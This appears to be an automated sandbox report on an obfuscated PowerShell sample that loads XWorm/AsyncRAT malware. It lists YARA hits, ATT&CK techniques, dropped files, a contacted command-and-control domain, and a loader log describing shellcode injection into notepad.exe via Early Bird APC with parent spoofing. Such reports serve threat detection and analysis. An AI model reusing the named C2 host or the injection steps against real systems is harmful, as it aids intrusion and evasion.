              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 2340, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MetasploitPayload
              Source: Yara matchFile source: amsi64_3488.amsi.csv, type: OTHER
              Yara detected XWorm
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4a10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4a10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4d1ce28.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.notepad.exe.1d8a4d1ce28.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 2340, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              PowerShell              		1
              DLL Side-Loading              		411
              Process Injection              		1
              Masquerading              		1
              Input Capture              		1
              Process Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Application Window Discovery              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
              Process Injection              		NTDS2
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets13
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              xy.ps10%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              kdke.duckdns.org1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              kdke.duckdns.orgtrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://github.com/DARKNOSY/Rush-PowerShell-Obfuscatorxy.ps1false
                		high

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1429329
                Start date and time:2024-04-21 23:26:13 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 19s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:xy.ps1
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winPS1@4/10@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 12
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .ps1

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                23:27:24API Interceptor52x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\notepad.exe.log

                Download File
                Process:C:\Windows\System32\notepad.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):654
                Entropy (8bit):5.380476433908377
                Encrypted:false
                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9434
                Entropy (8bit):4.9243637703272345
                Encrypted:false
                SSDEEP:192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
                MD5:EF4099FCAB6D29945272316889156337
                SHA1:5AAFAD4581D21179B892604BEBD6038792F8CBD6
                SHA-256:A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
                SHA-512:EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllulh49//lz:NllUu9//
                MD5:AADE84B9650AB09D8DC304B168D6D555
                SHA1:17BC4180A60DBFF0B3F9BF8E5C5987D452D1D868
                SHA-256:2C79C35AD1C4DFF21408F447C6AD565ACC3BDE8C8869108C8AA2F05B79539090
                SHA-512:594C57CC7D421DD576EA05344E4EA8179D93295003638AD34A634BB5632B88DF65B7AEB52515E50CA060DA57F7BC6553C0193FF1931CB95D9BDEC3845779045D
                Malicious:false
                Reputation:low
                Preview:@...e................................................@..........

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4n4y52un.zpo.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbiyp2nt.djy.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulitwssz.itx.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxvpx2jb.b1a.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6222
                Entropy (8bit):3.7297084940218497
                Encrypted:false
                SSDEEP:96:ppNCJP8CkvhkvCCtzqw5YPaLH2Gw5YPaBH27:ppoP5zqwkGwO7
                MD5:6B9B30235CA49F20D42608D734E65AB9
                SHA1:31A4ABC77A49CC1A59F37068CD0F9241DC7EE360
                SHA-256:F0483A5A8DD04310ECFCD17EC97C1ABA428A4DC9FE83A7F67662202A56EE82C7
                SHA-512:741A73A564695E6B7A19A090F3EE1E470D0490EA9A202F54F1F0FF57199956AD836E63E9A3526C2714523572BD3A2D0C7C7E7A1EB067F3AFC1571C16332A517C
                Malicious:false
                Preview:...................................FL..................F.".. ......Yd...P...2...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.......2.......2.......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.X`...........................d...A.p.p.D.a.t.a...B.V.1......X\...Roaming.@......EW)B.X\.............................-.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.XY............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.XY..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.XY.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.XY.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Xb......0..........

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VK51PUCXPPA4IE6ZTCL0.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6222
                Entropy (8bit):3.7297084940218497
                Encrypted:false
                SSDEEP:96:ppNCJP8CkvhkvCCtzqw5YPaLH2Gw5YPaBH27:ppoP5zqwkGwO7
                MD5:6B9B30235CA49F20D42608D734E65AB9
                SHA1:31A4ABC77A49CC1A59F37068CD0F9241DC7EE360
                SHA-256:F0483A5A8DD04310ECFCD17EC97C1ABA428A4DC9FE83A7F67662202A56EE82C7
                SHA-512:741A73A564695E6B7A19A090F3EE1E470D0490EA9A202F54F1F0FF57199956AD836E63E9A3526C2714523572BD3A2D0C7C7E7A1EB067F3AFC1571C16332A517C
                Malicious:false
                Preview:...................................FL..................F.".. ......Yd...P...2...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.......2.......2.......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.X`...........................d...A.p.p.D.a.t.a...B.V.1......X\...Roaming.@......EW)B.X\.............................-.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)B.XY............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)B.XY..............................W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)B.XY.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)B.XY.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)B.Xb......0..........

                \Device\ConDrv

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):754
                Entropy (8bit):4.95169071978365
                Encrypted:false
                SSDEEP:12:NF+lDB577hV1cTnQN+GISEXQEg2nWxktjXYHAWXXQEqP2axoEQVdsgkvmr6aACTY:NF+lD777Nwns+G7hEg2nXYTwEqP26LEC
                MD5:C00DB89658DC0F1C9C372D2DF0462C60
                SHA1:40F0472CC22B6BDE7B295AAC1EC356386014A33D
                SHA-256:73411DB5CC6BA229770F167D7768F60972F338E6C54A3EF68B2C5CB3CA27344A
                SHA-512:6132AE5D2F47E06E79C77DD4ED47BEEDD59105557A1CB8C6F685DCB47837DACC3DC58AD1CAECAA36FA3916BC7027A201B53C6E1E3411872A835288C59C1D043B
                Malicious:false
                Preview:[+] Launching a sacrificial process. [*] Spoofed parent process: explorer.exe (PID: 4084). [*] Spawned process: .C:\Windows\System32\notepad.exe (PID: 2340)..[+] Injecting shellcode via Early Bird APC Queue. [*] Memory allocated. [-] Size: ..65536 bytes. [-] Address: ..0x000001D8A2F50000. [-] Protection: .PAGE_READWRITE. [*] Payload decrypted and written. [-] Size: ..62208 bytes. [-] Address: ..0x000001D8A2F50000. [*] Memory protection changed. [-] Protection: .PAGE_EXECUTE_READ. [*] APC queued. [-] Thread ID: ..2352. [*] Thread resumed. [*] Payload executed..[+] Closing opened handles. [*] Process Handle: .0x000000000000096C. [*] Thread Handle: ..0x0000000000000988.

                Static File Info

                General

                File type:ASCII text, with very long lines (65346), with CRLF line terminators
                Entropy (8bit):4.945854578449006
                TrID:
                  File name:xy.ps1
                  File size:13'631'488 bytes
                  MD5:c003b6342b7828dcb9d436a403899d68
                  SHA1:25d2b57463626a791442321017592d46d93c2a6c
                  SHA256:7b81e1999036d174f355f3eb4d4bdb93fdd3a67c28f738dc6f14de84fff20880
                  SHA512:e09479003561d4054842f8dc0df9db248fc7c6d8fde5a14f6a35dbddad99e4b80b3347a54cde221034f824a2ab88bbf147709b87ebb2a7c6afba16d750c956d6
                  SSDEEP:24576:rPfpy2WOShH5WnUqtmyA67dI1JfaZRTAW+rb61if/c4w5GOrfPDmBc+fu5i5lbrt:bwUQMwGJoRJvYMb2YmbPsbTyxtBIoh
                  TLSH:01D6AE607F945AF9EF8D1E3E906AAB1DC7F042172C32706BFA415F05B9DA146810B26F
                  File Content Preview:# Obfuscated using https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator, made by DARKN0$Y....$decodedScript = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(@"..IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9Sd

                  File Icon

                  Icon Hash:3270d6baae77db44

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:23:27:02
                  Start date:21/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\xy.ps1"
                  Imagebase:0x7ff6cb6b0000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:2
                  Start time:23:27:02
                  Start date:21/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff6ee680000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:23:27:35
                  Start date:21/04/2024
                  Path:C:\Windows\System32\notepad.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\notepad.exe
                  Imagebase:0x7ff702c00000
                  File size:201'216 bytes
                  MD5 hash:27F71B12CB585541885A31BE22F61C83
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.2207328628.000001D8A4A10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 00000006.00000002.2206815552.000001D8A2F50000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000002.2207498321.000001D8A4D11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:moderate
